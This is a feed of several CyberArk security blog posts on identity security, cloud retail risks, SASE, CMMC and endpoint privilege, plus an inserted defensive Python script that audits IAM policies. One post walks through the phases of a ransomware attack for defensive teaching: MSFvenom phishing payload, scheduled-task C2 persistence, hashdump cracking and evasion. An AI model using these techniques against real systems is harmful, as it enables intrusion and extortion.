Yet as these criminal groups start to appear more and more like “real” businesses, they’ll also open themselves up to new risks. Just like any other enterprise, they’ll face new security challenges in managing multi-tenant SaaS applications, securing remote access to sensitive systems and data and more. While being forced to ramp up their own security protections, adversaries will increasingly get caught by defenders using their own offensive tactics against them.

Innovation 2: Attackers Will Employ OSS to Automate and Magnify Supply Chain Attacks

Our digital economy runs on open source software (OSS) — it’s flexible, scalable and harnesses collective community power to spark new innovations. But countless “open” and “free” OSS libraries also mean a dramatically expanded attack surface and a way for threat actors to automate their efforts, sidestep detection and do more harm.

The April 2021 Codecov breach gave us a glimpse of how one subtle tweak in one line of code can turn a completely benign library into a malicious one — putting any organization using it at risk. Using this highly evasive infiltration method, attackers can target and steal credentials to reach thousands of organizations across a supply chain in unison.

In the next 12 months, attackers will continue looking for new ways to compromise open source libraries. We have seen attackers implementing typosquatting-like attacks by creating code packages that include subtle changes to the packages’ names (i.e., atlas-client vs. atlas_client). These were actually trojanized versions of the original packages, which implement or download a backdoor or credential-stealing functionality. In another case, an NPM package was trojanized to run a cryptomining script and credential theft malware after a developer’s credentials were compromised.

Organizations must remain vigilant, as these subtle attacks will rarely send up signals, making them extremely difficult to spot — especially as such libraries are deployed into the pipeline as part of legitimate day-to-day operations, and in many cases, may look benign as the malicious code is downloaded as a dependency. What’s more, since these automated attacks are easy and quick to execute with a very limited signature, they’ll become even more frequent, sudden and damaging.

Innovation 3: Brand New Spots Will Help Attackers Hide in Plain Sight

As if it’s not already tricky enough, security is going to get even more complicated, thanks to new hiding places introduced by cloud, virtualization and container technologies. 

For instance, as micro virtualization becomes increasingly popular, threat actors can isolate malware in these virtual systems while keeping it hidden from host-based security controls.

While these new attack techniques haven’t been seen much in the wild … at least not yet, financially motivated and nation state threat actors have been observed testing systems such as Windows Subsystem for Linux (WSL) — a subsystem that secures credential and authentication processes — as they look for new ways to compromise endpoint machines.

By running ransomware within a Linux infrastructure, for example, Endpoint Detection and Response (EDR) and other host-based endpoint security tools cannot typically identify the malicious activity, making it possible for attackers to encrypt or exfiltrate data with ease — all while hiding in plain sight.

Editor’s note: To stay on top of emerging cybersecurity threats and original research from CyberArk Labs and the CyberArk Red Team, visit the CyberArk Threat Research Blog.


Identity and Access Management is Changing: Here’s Where It’s Headed https://www.cyberark.com/blog/identity-and-access-management-is-changing-heres-where-its-headed/ Wed, 01 Dec 2021 13:00:29 +0000 https://www.cyberark.com/?p=125215 Archit Lohokare on Access Management

We’re living in an exciting, highly dynamic world that is driven by rapidly evolving technology. To grow and compete, organizations have accelerated the pace of their digital transformation initiatives by seven years, according to McKinsey & Company. Yet the popular maxim “move fast and break things” sometimes means security gets left behind.

It’s easy to see how this can happen: traditional security threat prevention technologies have relied largely on network-based security controls. They have monolithic architectures, which are manual and tedious. They have policy-based authorization controls that barely have a semblance of session security. They burden users with session timeouts and terminate session options, and their audit and compliance capabilities are either missing or very costly.

Fortunately, the tide has started to turn in the last few years, with SaaS-based Identity and Access Management (IAM) moving higher on enterprise security teams’ priority lists. In particular, access management tools are designed to reflect today’s boundary-less enterprise reality and place identity at the core of security by using smart, conditional authentication and authorization mechanisms.

Yet nearly all these current access technologies stop at the authentication layer, providing very few, if any, session controls to monitor access to — and interactions with — sensitive or privileged resources. Without such controls in place, malicious insiders and external actors alike have a better chance of progressing their attacks without detection.

The Evolution of Access Management

As the lines continue to blur between identity and privilege, organizations need ways to confidently verify that workforce identities — requiring various levels of access at various times and from various locations — are indeed who they say they are, that their devices are verified and that their access is intelligently limited to exactly what’s required.

This is where artificial intelligence (AI) comes in and where the next wave of access management innovation is focused.

Using machine learning and contextual signals — including user data, device data and activity data — these access management solutions are constantly getting smarter and building more descriptive, visual risk profiles of individual human and machine identities. This helps organizations strengthen predictive capabilities so they can better anticipate and mitigate future threats. And through AI, these solutions can also determine when a user is low risk and legitimate, serving up a simplified authentication experience that allows users to access the apps they need to do their jobs.

When integrated into a unified platform, these AI-powered tools work even harder together to deliver higher quality data sets, fine-tune algorithms that can reliably differentiate between anomalous and malicious access attempts and automate responses while providing a real-time feedback loop to the organization’s machine learning engine to constantly improve performance.

The Journey Toward Passwordless Authentication

Passwordless authentication is a great example of an intelligent Identity Security approach in action — and represents a huge opportunity for organizations focused on securing their anytime, anywhere workforces.

I often find myself using this quote: “In today’s world, attackers don’t really need to hack in; they just log in.” It’s true. Traditional passwords and credentials remain one of the leading causes of identity-related attacks and breaches for numerous reasons. And attackers particularly target privileged credentials that enable access to sensitive systems and networks, since they’re able to get so much information from just one source.

Industry research points to growing consumer comfort and confidence in passwordless authentication, such as biometric authentication methods (e.g., facial recognition and fingerprints) and behavior-based methods (e.g., passively observed signals that require no effort from the user). But when it comes to the enterprise, achieving true passwordless authentication won’t be like flipping a switch — it’s a journey that starts with giving your organization and its people and users the right processes and tools.

You can start by giving users access to a range of passwordless authenticators, such as FIDO2 security keys, biometrics, QR codes and magic links. These authenticators need to come with frictionless, intuitive self-service management capabilities to help make sure that users don’t get locked out of systems while trying to get their work done. Next, it’s important to make sure that all resources — from applications, to servers, to endpoints — are protected by comprehensive IAM solutions, whether they are hosted on-premises or in a hybrid environment. Finally, it’s important to have the systems and structure in place to measure key performance indicators and compliance around these passwordless initiatives so you can drive continuous improvements.

How to Achieve Zero Trust Through Holistic Identity and Access Security

Passwordless authentication is one technology in a broader set of Identity Security solutions that paves the way for Zero Trust, the widely accepted “trust nothing, verify everything” security philosophy.

At CyberArk, our Zero Trust vision brings concepts of “Zero Trust Access” and “Zero Trust Privilege” together. Zero Trust Access aims to ensure that every user and device is validated and that all access is intelligently limited based on the principle of least privilege. Zero Trust Privilege, on the other hand, works to secure and monitor privileged accounts and access, granting just-in-time, just-enough privilege for users so they can stay productive. This holistic, risk-based approach encompasses all identities, whether they are human identities, such as administrators, DevOps, workforce or vendor users, or nonhuman identities, such as machines and RPA bots, to help organizations protect their applications, infrastructure and data.

I recently spoke with Tom Field of Information Security Media Group to dig into the ever-evolving IAM technology landscape, how security leaders can incorporate solutions that emphasize frictionless user experiences and AI-powered security and ways to instill a security-first mindset across an organization to boost overall confidence and agility. You can check out our entire conversation here or click on the tile below.

The Evolution - and Revolution - of Access

Archit Lohokare is VP of Product Management at CyberArk.

Unwrapping Retail’s Cloud Security and eCommerce Risks this Holiday Season https://www.cyberark.com/blog/unwrapping-retails-cloud-security-and-ecommerce-risks-this-holiday-season/ Wed, 24 Nov 2021 15:21:19 +0000 https://www.cyberark.com/?p=124939 Retail’s Cloud Security and eCommerce Risks this Holiday Season

Sustained supply chain issues, shipping delays and other current realities have combined to extend the duration of the 2021 holiday shopping season. While retailers work hard to adjust, there’s reason for holiday cheer — according to National Retail Federation estimates, 2021 holiday sales will grow between 8.5% and 10.5% over 2020.

Consumers are shopping eagerly, both in-store and online. To support their customers’ omnichannel shopping experiences, retailers are utilizing operational efficiencies of cloud-hosted eCommerce sites and applications to improve the customer experience. Just a few examples include:

  • Real-time inventory tracking with cloud-hosted databases and applications
  • Personalized shopping experiences with cloud-hosted big data and machine learning services
  • Better eCommerce site performance and availability during peak shopping periods with auto-scaling capabilities in Infrastructure-as-a-Service (IaaS) environments, including serverless functions

Despite these advantages, retailers must remain wary of attackers seeking to capitalize on big shopping holidays, including attempts to gain unauthorized access to cloud-hosted systems. In fact, as the FBI warns of increased scams and fraud, security must remain a top priority for retailers embracing the cloud to make the most of this shopping season. According to IBM, the cost of a data breach for retailers increased 62.7% in the last year, with an average cost of $3.27 million.

Cloud-hosted PII Elevates the Risk (and Cost) of an eCommerce Security Breach

No matter where customers transact — in person or online — many retailers store personally identifiable information (PII) and payment details in the public cloud to drive cost efficiencies for storage and processing. For attackers, this provides major opportunities: one successful attack on the right database or cloud storage system can lead to devastating, far-reaching consequences — from financial loss and legal action to reputational damage and loss of customer trust.

Additionally, since retailers collect credit card information, they are subject to the PCI (Payment Card Industry) Data Security Standards, which require that, to “ensure critical data can only be accessed by authorized personnel, systems and processes must be in place to limit access.” Failing to protect this data, even inadvertently, can expose retailers to fines and other penalties.

Five Common Cyber Weaknesses in Retail

As recent data shows, data breaches are increasingly common in the retail industry. And risk factors can easily compound in dynamic cloud environments, while rapid introduction of new cloud provider services can accelerate the potential for security mistakes and misconfigurations. Some of the most common weaknesses that can be exploited in the retail space include:

  • Excessive PII access from misconfigured entitlements. The rapidly changing nature of the cloud means that resources are often configured to grant human and machine identities excessive access. Attackers and malicious insiders can exploit identities with excessive permissions to reach critical cloud infrastructure, steal or alter sensitive data or interrupt cloud-hosted services. The principle of least privilege access is key here — all identities should have only the bare minimum necessary permissions to perform their intended functions.
  • Event-driven scaling during holiday shopping peaks. Many retailers utilize serverless functions for event-driven eCommerce site architectures, triggering scaling processes in times of peak demand such as Black Friday or Cyber Monday. This rapid scaling can minimize website latency and optimize customer shopping experiences. But serverless functions can also be notoriously powerful in the hands of an attacker. For this very reason, implementing least privilege is critical for all serverless functions across all major public cloud providers.
  • Gaps in internal Identity and Access Management (IAM) enforcement. If an unprotected workforce identity with sensitive access to cloud resources is compromised, an attacker can gain access to those resources. In addition to enforcing least privilege across systems, enforcing multi-factor authentication for all employee access to a cloud environment can provide an extra layer of security by reducing risk of credential theft.
  • Hard-coded application secrets. Modern eCommerce applications are the result of complex interactions between machine identities. eCommerce sites build on top of one another, integrating with payment services such as Paypal, Affirm or Klarna. When building their eCommerce applications, developers can sometimes leave secrets (credentials, passwords, keys and tokens) embedded in their code, exposing them to potential attackers. Throughout DevOps pipelines and eCommerce software supply chains, all hardcoded secrets should be securely managed and programmatically rotated to reduce the risk of compromise.
  • eCommerce website vulnerabilities. Attackers also look for easy ways to exploit common vulnerabilities within eCommerce sites. Without the right layers of security in place, retailers are vulnerable to attacks such as Distributed Denial of Service (DDoS), SQL injection and e-skimming — all of which can disrupt business and potentially give attackers access to valuable customer data. Retailers should follow Center for Internet Security (CIS) best practices to mitigate these risks.
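The first three weaknesses above (excessive entitlements, over-privileged serverless functions and missing MFA enforcement) can be checked mechanically in an IAM policy document before the holiday peak. The following is an added example, not CyberArk's code; it assumes AWS-style IAM JSON and the aws:MultiFactorAuthPresent condition key, and the policies, account id and resource names in it are constructed for illustration.

```python
"""Audit IAM policy documents for wildcard grants and missing MFA conditions."""
import json
from typing import Any

# Constructed: an inventory-lookup serverless function that was granted far
# more than it needs (hypothetical account id and resource names).
BROAD_FUNCTION_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": "dynamodb:*", "Resource": "*"},
        {"Effect": "Allow", "Action": ["s3:GetObject", "s3:DeleteObject"],
         "Resource": "arn:aws:s3:::example-product-images/*"},
    ],
}

# Constructed: the same function scoped to the one table and one bucket
# prefix it actually reads.
SCOPED_FUNCTION_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow",
         "Action": ["dynamodb:GetItem", "dynamodb:Query"],
         "Resource": "arn:aws:dynamodb:us-east-1:123456789012:table/inventory"},
        {"Effect": "Allow", "Action": "s3:GetObject",
         "Resource": "arn:aws:s3:::example-product-images/*"},
    ],
}

# Constructed: an engineer's policy on a PII table that never requires MFA.
ENGINEER_POLICY_NO_MFA = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": "dynamodb:Scan",
         "Resource": "arn:aws:dynamodb:us-east-1:123456789012:table/customers"},
    ],
}


def _as_list(value: Any) -> list:
    """IAM accepts either a string or a list for Action/Resource fields."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def audit_policy(policy: dict, human_principal: bool = False) -> list[str]:
    """Return findings for each Allow statement; an empty list means clean.

    human_principal=True means the policy is attached to a person (IAM user
    or SSO role) rather than a workload, so every Allow statement is expected
    to carry the aws:MultiFactorAuthPresent condition.
    """
    findings: list[str] = []
    for idx, stmt in enumerate(policy.get("Statement", [])):
        if stmt.get("Effect") != "Allow":
            continue
        sid = stmt.get("Sid", f"statement[{idx}]")

        # NotAction / NotResource grant everything except the listed items,
        # which is almost never a least-privilege intent.
        if "NotAction" in stmt or "NotResource" in stmt:
            findings.append(f"{sid}: uses NotAction/NotResource (inverted grant)")

        for action in _as_list(stmt.get("Action")):
            if action == "*":
                findings.append(f"{sid}: wildcard action '*'")
            elif action.endswith(":*"):
                findings.append(f"{sid}: service-wide action '{action}'")

        for resource in _as_list(stmt.get("Resource")):
            if resource == "*":
                findings.append(f"{sid}: wildcard resource '*'")

        if human_principal:
            mfa = stmt.get("Condition", {}).get("Bool", {}).get(
                "aws:MultiFactorAuthPresent")
            if str(mfa).lower() != "true":
                findings.append(f"{sid}: no aws:MultiFactorAuthPresent condition")
    return findings


if __name__ == "__main__":
    for name, policy, human in [
        ("broad function", BROAD_FUNCTION_POLICY, False),
        ("scoped function", SCOPED_FUNCTION_POLICY, False),
        ("engineer, no MFA", ENGINEER_POLICY_NO_MFA, True),
    ]:
        print(name, json.dumps(audit_policy(policy, human), indent=2))
```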

Steps to Secure the Cloud and Minimize Holiday eCommerce Disruption

Fortunately, there are established controls that can help retailers strengthen the security of their cloud environments this holiday season. Check out the eBook “Retail and eCommerce: Securing Your Brand and Locking in Consumer Confidence” to explore best practices. You’ll also discover how your retail organization can “unwrap” new operational advantages and drive secure, rapid cloud expansion with unified Identity Security.

 

]]>
How to Use the MITRE ATT&CK Framework to Fight Ransomware Attacks https://www.cyberark.com/blog/how-to-use-the-mitre-attck-framework-to-fight-ransomware-attacks/ Mon, 22 Nov 2021 17:00:22 +0000 https://www.cyberark.com/?p=124911 Use the MITRE ATT&CK Framework to Fight Ransomware Attacks

Chinese military general Sun Tzu’s treatise The Art of War has been cited over the years by millions of self-help gurus and corporate strategy consultants – and misquoted in a million more PowerPoint slides. It’s beyond cliché at this point, but indulge us for a moment, because some things become cliché because they never cease to be relevant. Sun Tzu claimed that “all warfare is based on deception,” a truism that speaks as much to 5th century battlefields as it does to 21st century cybersecurity. And while we think of malicious agents sneaking around the shadows of the cyber world waiting to strike as soon as a flaw reveals itself, defenders must be equally trained in cunning and deception.

This thinking underpins the popular “MITRE ATT&CK™” framework. Short for “Adversarial Tactics, Techniques and Common Knowledge,” this agnostic database categorizes known adversarial tactics and techniques to help cybersecurity teams, threat hunters and Red Teamers keep tabs on how attackers think and operate. This information can help organizations prioritize mitigation strategies and controls, recover from breaches faster and sometimes even trick foes into trapping themselves.

When our own white hat hacker and CyberArk Global Sales Engineer Len Noe talks through such attack scenarios, he sounds a bit like he’s channeling Sun Tzu himself, dropping aphoristic nuggets such as “cyber attacks aren’t singular events, but an accumulation of steps” or “you can’t hack what isn’t there.”

With Noe providing occasional guidance, we’re putting the MITRE ATT&CK framework to work by examining some of the specific tactics and techniques reportedly used in a high-profile 2021 ransomware attack on one of the largest fuel pipelines in the United States. Based on publicly reported information on the attack, Noe’s full analysis can be seen in this on-demand Attack & Defend guided experience.

Understanding what has been done before can help organizations better prepare for the next way in, or the newest means of attack. Because, as Noe puts it, “You need to address the technique, not the tool.”

Using the MITRE ATT&CK Framework to Deconstruct a Real-World Ransomware Attack

ATTACK PHASE 1 – RECON

During this initial phase, the attacker combed through publicly available information about its intended target and launched a Metasploit listener to keep an ear on incoming connections. The attackers employed simple phishing techniques, such as a fake email from the organization’s IT admin requesting that the user upgrade their version of PuTTY. This “upgrade” carried a malicious payload generated with MSFvenom, which created a “call home” between the targeted machine and the attacker.

ATTACK PHASE 2 – INITIAL ACCESS

From there, the threat actors navigated to the user’s desktop and uploaded an “AD Recon” tool to get a lay of the Active Directory land, and better understand the company’s internal infrastructure. After running some advanced data recon reports and exfiltrating the necessary information, the attackers removed traces of their activity to avoid discovery.

In this particular scenario, the attackers used several different MITRE-defined techniques to gain an initial foothold: they abused access to valid accounts gained through social engineering and other techniques; they engaged in active phishing campaigns targeting credentials to compromise identities and gain more access; and they exploited public-facing applications.

ATTACK PHASE 3 – EXECUTION

Once the initial foothold was established, attackers dug through output directories to gain information about the location of the domain controller, along with its IP address and hostname.

The domain controller is the crown jewel for attackers and if not secured properly, unauthorized access can be devastating for an organization. Attackers can exploit vulnerabilities in Kerberos, the default authentication protocol for Microsoft Windows, to pose as a legitimate user, traverse a network undetected, navigate from host to host to steal data, spread ransomware or wreak havoc in any number of ways.

With access to the domain controller, it was very simple for these attackers to run a built-in tool to set up dual sessions — essentially setting their own computer up in parallel to the system admin.

As Noe points out, securing Kerberos implementation programs is critical for keeping unauthorized users from gaining access and executing devastating attacks such as “golden ticket” and “pass-the-hash.” It goes back to the importance of an “assume-breach” mentality.

ATTACK PHASE 4 – PERSISTENCE

Patience and persistence are often seen as virtues, but they are also key to ransomware attacks. Once the attackers established that parallel admin, they used malicious agents to create a scheduled task that – when live – automatically reached back out to the command and control server and kept the attacker’s portal back to that host open.

From there, they were able to run exploits and hashdumps – essentially a glut of information that can be rendered readable by a program like Hashcat. Once that information was readable and sort-able – which takes time and, well, persistence – the attacker was able to locate admin passwords critical to the mission.

It’s here that Noe advises some sort of automatically re-generated password system, to avoid having one set of keys to unlock a system, as well as to help prevent against re-used or replicated passwords across systems. Again, it’s about limiting lateral and upward movement as much as possible.

ATTACK PHASE 5 – ESCALATION

The name of the game is almost always privilege escalation. Attackers kept cracking open hashdumps and pulling out credentials in an attempt to navigate around the system. They performed various types of credential-oriented operations and ultimately, used this elevated access to navigate to where they wanted to dump – or, more accurately, upload – their ransomware payload.

ATTACK PHASE 6 – EVASION

As Noe says, “After initial access, an attacker’s second priority is defense evasion. The ability to remain undetected is critical.” This is where things get a little Spy vs. Spy – the compromised system (hopefully) has some covert defense mechanisms, while the adversaries try their best to sneak around. For example, to keep things “clean,” attackers will remove output directories, CSV files (Comma-separated values) and powerscripts to eliminate any indications of compromise. These evasive techniques highlight the necessity of a layered, defense-in-depth approach to ransomware protection, Noe points out.

ATTACK PHASE 7 – CREDENTIAL ACCESS

This ransomware attack, like so many others before it, went far beyond desktop mirroring and hashdump-diving for passwords. It targeted privileged credentials that gave the adversary far-reaching administrative access to sensitive data and systems.

This is why, Noe stresses, privileged access management controls that grant users the minimum set of rights are an essential part of that layered security approach — and contribute to the broader “trust nothing, verify everything” Zero Trust philosophy.

The Next Big Attack Probably Won’t Look Like This

While the MITRE ATT&CK framework is indeed useful, it has to be a fluid resource — a starting point. Attackers are constantly innovating, and each attack follows its own path. There’s a constant stream of new techniques emerging in the wild — from biohacking to ransomware-as-a-service innovations — along with the occasional return of old tricks. As Noe explains, “We’re seeing brand new ways of zipping files that include JavaScript that executes when you unzip. We’ve seen that before, but it’s been a long time since attackers have gone after compression this way.”

So in the words of our cybersecurity philosopher Len Noe, being proactive, being creative and thinking like an attacker are necessary approaches to cybersecurity. But, it’s how we balance tackling the knowns and preparing for the unknowns that will not only help win battles against attackers, it could just help win the war.

]]>
What is SASE and How Does it Relate to Zero Trust? https://www.cyberark.com/blog/what-is-sase-and-how-does-it-relate-to-zero-trust/ Thu, 18 Nov 2021 14:00:00 +0000 https://www.cyberark.com/?p=124773 What is SASE

The days of an on-premises data center being at, well, the center of a defined corporate IT universe, are far behind us. And as organizations continue to shift resources to the cloud, embrace SaaS applications and implement endpoint protection strategies to support highly distributed work models, Zero Trust has become imperative.

The Zero Trust principle of “never trust, always verify” dovetails with another popular technology trend: Secure Access Service Edge, or SASE (pronounced “sassy”) for short. This model combines various networking and security techniques to shift controls to the “edge” — in other words, closer to individual users and their devices, no matter where they are in the world.

Here’s a high-level look at what SASE is and how it complements a Zero Trust approach to security.

What is SASE?

Initially introduced by Gartner, SASE is a framework that combines software-defined wide area networking (SD-WAN) elements with various network security capabilities such as firewalls, secure web gateways (SWGs), cloud access security brokers (CASBs) and Zero Trust access controls — and delivers them as a managed cloud service.

Combining the power of these various technologies, SASE shifts the center of connectivity and security away from the on-premises data center. Instead of simply placing one firewall around a network perimeter, it places various controls around applications, servers and other resources — representing the next step in micro-segmentation. Meanwhile, SASE helps network and cloud architects build a secure bridge between access points and the service edge. While traditional networking approaches created inherent security gaps, SASE focuses on consistent coverage across global, distributed workforces.

Why is SASE important now?

In today’s digital organizations, remote workers, vendors and partners all require secure, uninterrupted access to data, applications and services anytime, and from anywhere. Meanwhile, workloads are running as infrastructure as code, SaaS application usage is surging, and user traffic is flowing from numerous locations to numerous cloud services far beyond the company data center.

Organizations need to securely connect all these identities — users, devices and applications — to corporate systems and data, while maintaining full visibility across these distributed connection points. By managing various technology components in a centralized fashion, SASE provides a structured way to accomplish these goals.

So where does Zero Trust fit in here?

Think of it this way: SASE represents a consolidated architecture and way for organizations to streamline operational aspects of managing technology and infrastructure. This can help them save money, reduce complexity and boost flexibility and performance.

SASE makes it easier to enforce Zero Trust and consistently apply role-based, identity-centric controls and granular policies for data movement across the entire network.

A holistic, strategic approach to cybersecurity combines the principles of SASE and Zero Trust, along with other powerful security solutions that place identity — not the data center — at the center of the security equation.

The CyberArk Identity Security Platform is foundational to achieving Zero Trust. Our approach focuses on securing individual identities throughout the cycle of accessing critical assets. This means authenticating that identity accurately, authorizing that identity with the proper permissions, and providing access for that identity to privileged assets in a structured manner – all in a way that can be audited (or accounted for) to ensure the entire process is sound.

 

]]>
Breaking Down the CMMC and How CyberArk Can Help Support Compliance https://www.cyberark.com/blog/breaking-down-the-cmmc-and-how-cyberark-can-help-support-compliance/ Tue, 16 Nov 2021 14:00:01 +0000 https://www.cyberark.com/?p=124540 Breaking Down the CMMC

As mobile workforces and cloud service usage continue to surge, organizations are struggling to provide secure, authorized access to their most sensitive information while keeping it out of the wrong hands.

This cybersecurity challenge is even more pronounced for the 300,000 companies supplying the U.S. Department of Defense (DoD) because theft of information could damage the U.S. economy, undermine technical advantages and even threaten national security. These organizations need to know exactly who is accessing and sharing confidential data, while balancing availability with security. And their ability to do this effectively is precisely what the Cybersecurity Maturity Model Certification, or CMMC, aims to measure.

Here’s a brief breakdown of what the CMMC is as of today and why it matters. It’s important to note that the DoD is currently making some changes to the program structure and requirements, so keep an eye out for additional updates. In this post, you’ll also explore how CyberArk can help organizations implement essential security controls for privileged and administrative identities to meet current CMMC requirements.

What is the CMMC?

CMMC is a model detailing cybersecurity best practices and processes from several security frameworks, including standards from the National Institute of Standards and Technology (NIST). It was established to protect two key types of unclassified information disseminating throughout the Defense Industrial Base (DIB) and the DoD supply chain:

  1. Federal Contract Information (FCI): “Information provided by or generated for the government under contract not intended for public release,” as defined by the DoD.
  2. Controlled Unclassified Information (CUI): “Information that requires safeguarding of dissemination controls pursuant to and consistent with laws, regulations and government-wide policies,” as defined by the DoD.

Why is the CMMC so important?

CMMC represents a major move from self-certification to formal certification by an approved assessor to analyze an organization and assign a maturity level based on the state of its cybersecurity program. Any organization wishing to participate in the DoD supply chain must adhere to CMMC requirements at some level.

What’s included in the CMMC?

The CMMC includes 17 domains broken down into five maturity levels and 171 cybersecurity best practices (75 technical and 96 non-technical controls), aligned with a set of capabilities. This breakdown formalizes cybersecurity activities within organizations, so they are both consistent and repeatable. The CMMC provides a certification that ensures organizations implement these required processes and practices. To meet certification requirements, organizations must meet a cumulative set of processes and practices. In other words, to advance to the next level of certification, an organization first must demonstrate proficiency in processes and practices at lower levels.

To whom does CMMC apply?

All DoD defense contractors, including prime and subcontractors, that handle CUI/FCI data are required to comply with CMMC requirements. Commercial Off-the-Shelf (COTS) technology is out of scope unless a system manages, stores, transmits, collects, releases and/or supports CUI/FCI data in some capacity.

DIB contractors can seek CMMC certification for an entire enterprise or for only one or more segments of the enterprise, depending on where and how securely they store the information. To qualify for certification, organizations must provide proof of institutionalization of processes. They also must show that they have implemented the practices to support those processes.

What are the five levels of the CMMC?

The CMMC domains are mapped across five levels of security controls, as shown below. To reach Level 1, organizations must follow a set of defined practices, including implementing 10 specific technical security controls covering basic cyber hygiene fundamentals. To reach Level 3 or above, organizations must prove the maturity of a process and provide documented evidence. To achieve the highest level of information protection (Level 5), organizations must implement a total of 75 technical controls across areas including risk management, access control and identification and authentication. They must also demonstrate how these practices are standardized across the organization.

CMMC Five Levels of Security Controls

How can CyberArk support organizations in achieving CMMC compliance?

The CyberArk Identity Security Platform helps federal government agencies meet today’s challenging security and compliance requirements. Our toolset — including DoD UC APL-certified CyberArk Privileged Access Manager — provides organizations a jumpstart to CMMC compliance through:

  • Policy enforcement and audit trails based on defined roles
  • Integrations with many other tools for a holistic access solution
  • Professional services and training that can help to further mature the CMMC program
  • A robust CyberArk partner network for integrations
  • Integrations with what an organization has in place
  • The ability to address risk management, domain administration, firewalls, vulnerability management, credentials and endpoint management

Which of the CMMC technical controls can CyberArk address?

In total, the CMMC has 75 technical controls (the 96 non-technical controls are a mix of administrative tasks, policies and procedures).

The CyberArk solution satisfies 41 of the technical controls needed for the CMMC levels. Through integrations with other security tools offered by our partner network, CyberArk can help organizations meet the remaining 34 technical controls.

On the journey toward CMMC compliance, CyberArk can help your organization effectively and efficiently meet process and practice requirements to protect information through comprehensive Identity Security controls. Visit here for a detailed analysis of the ways in which CyberArk can support compliance with CMMC requirements. You’ll find an at-a-glance view of individual requirements mapped to each CMMC level, the specific type of support provided and whether the solution is supplied directly through CyberArk solutions or with the involvement of third-party partnerships.

]]>
What a 100-Year Plant Disease Reveals About Endpoint Privilege Security https://www.cyberark.com/blog/what-a-100-year-plant-disease-reveals-about-endpoint-privilege-security/ Tue, 09 Nov 2021 14:00:20 +0000 https://www.cyberark.com/?p=124521 Plant Disease Reveals About Endpoint Privilege Security

At the turn of the 20th century, a little-known plant disease called white pine blister rust emerged in the United States and began rapidly ravaging entire forests. As the disease spread across the country, the government stepped in to protect the flailing timber industry by banning the growth and sale of gooseberries and currants — two innocent-looking culprits behind the outbreak.

As hosts, these berry plants carried the disease without being harmed themselves, essentially serving as a launchpad for the virus. The idea was that by eliminating these two plants, white pine blister rust could no longer reproduce and infect more vulnerable pine trees. But in the process, people missed out on two very popular (at the time) summertime fruits, along with their numerous health benefits. (Fun fact: the black currant is a nutritional superstar that delivers 4x as much vitamin C as oranges!) Luckily, the ban was lifted in the 1960s, and new varieties of rust-immune gooseberries and currants were developed, much to the delight of pie lovers across America.

Now you’re probably thinking, what does tree fungus have to do with cybersecurity? Stay with us here…

Cyber intruders typically follow a sequential set of steps to execute their attacks. While there are many methods they can use to jump start their efforts, compromising identities and abusing privileged credentials is an especially productive tactic.

A Windows Defender Application Control (WDAC) vulnerability that recently came to light illustrates the efficacy of this approach. An attacker can exploit this particular flaw (CVE-2020-0951), execute commands on the endpoint and bypass the WDAC system, which is meant to block malicious software from running. But first, the adversary must gain privileged access to launch the attack — underscoring the critical need to enforce privilege security on the endpoint.

While most organizations today recognize this well-worn “privileged pathway,” privileged accounts exist everywhere within an organization. In fact, many privileged credentials are hardcoded or embedded in enterprise software, systems and servers. Since privileged accounts can’t be completely eradicated, and are very much needed to support a healthy IT ecosystem, how can they peacefully co-exist in environments that are constantly at risk of threats like ransomware infection that originate on the endpoint?

Organizations can take a page from the white pine blister rust eradication playbook and apply similar logic used by mid-century forest and agriculture experts to:

  • Securely manage “host” gooseberry and currant plants (or, in our case, privileged local admin accounts), making it difficult for the rust (or attacker) to hopscotch its way into a susceptible white pine (or IT network), while enforcing granular least privilege policies for IT administrators who have powerful access.
  • Remove new berry plant species’ ability to “carry” the virus. In the digital realm, this equates to removing administrative rights from regular user accounts. This is one of the most effective ways to reduce your endpoint attack surface. If end-users require elevated privileges to perform certain approved tasks like updating Windows or changing their laptop’s power settings, automated just-in-time privilege elevation can automatically give them the privileges they need for a certain period — and take them away as soon as the task is complete.
  • Carefully monitor for additional species that could threaten the forest — and test them before they can grow and spread. In our enterprise analogy, if an end-user launches an application on their laptop that’s legacy, unknown or unapproved by the organization, the ability to rapidly analyze the application’s risk level can help identify, block and contain attacks on the endpoint — all without hindering end-user productivity or burdening IT help desk teams.
  • Promote tree health and growth by bringing in experienced arborists and their tools to address issues (or common attack vectors, such as browsers containing saved passwords or known bad or “blacklisted” applications) putting the tree (or business) at risk, prune the dead wood (such as removing excess entitlements) and help all the tree’s living parts (or users) work together productively in a safe and controlled manner.

By following these simple yet effective steps as part of a defense-in-depth approach, your organization can significantly reduce the risk of ransomware and other endpoint attacks without introducing user friction. In other words, you can have that gooseberry pie and eat it too!

Speaking of tools that can help keep your endpoints secure — from servers, to workstations, to laptops — check out CyberArk Endpoint Privilege Manager. Request a 30-day trial of our fully SaaS solution and you can start strengthening your security posture on day one.

]]>
Why Reporting Cybersecurity Business Impact is About Seeing the Forest from the Trees https://www.cyberark.com/blog/why-reporting-cybersecurity-business-impact-is-about-seeing-the-forest-from-the-trees/ Fri, 05 Nov 2021 13:00:01 +0000 https://www.cyberark.com/?p=124460 Reporting Cybersecurity Business Impact

You know when you get stuck sitting next to that one relative who takes forever to tell a story or get to the punchline of a joke? Executive board meetings and quarterly updates sometimes go this way. With so many metrics to share, cybersecurity program leads can easily get bogged down in the technical details — leaving company stakeholders or steering committees glassy eyed, or worse, questioning the program’s efficacy altogether.

Cybersecurity leaders must come to the table with a powerful, yet succinct, reporting framework and dataset to build a compelling case and continuously justify their programs. But this requires a shift in perspective — because you can’t see the forest if you’re stuck in the trees.

Zooming Out on the Forest Starts with the Right Framework

Despite constant and evolving digital threats, cybersecurity programs are too often viewed as a black hole: money goes in but doesn’t come out, as they’re not traditional revenue-generating parts of the business. This makes it even more important for Identity and Access Management (IAM) and other security program leads to demonstrate their program’s value within the broader business context — either in quantitative terms of dollars and cents or through a compelling qualitative storytelling approach.

Fortunately, the solution is something cybersecurity professionals are already well-accustomed to using: a reporting framework.

Every company’s reporting framework will look a bit different — after all, your organization has a unique set of goals and requirements. But there are several common foundational elements that should be incorporated into any reporting architecture to help demonstrate program health and overall value.

The first? Defining what overall program success means to your organization. Do this by asking three important questions:

1. Who are we?

2. What are the business initiatives and goals that motivate us?

3. Why do we pursue those goals?

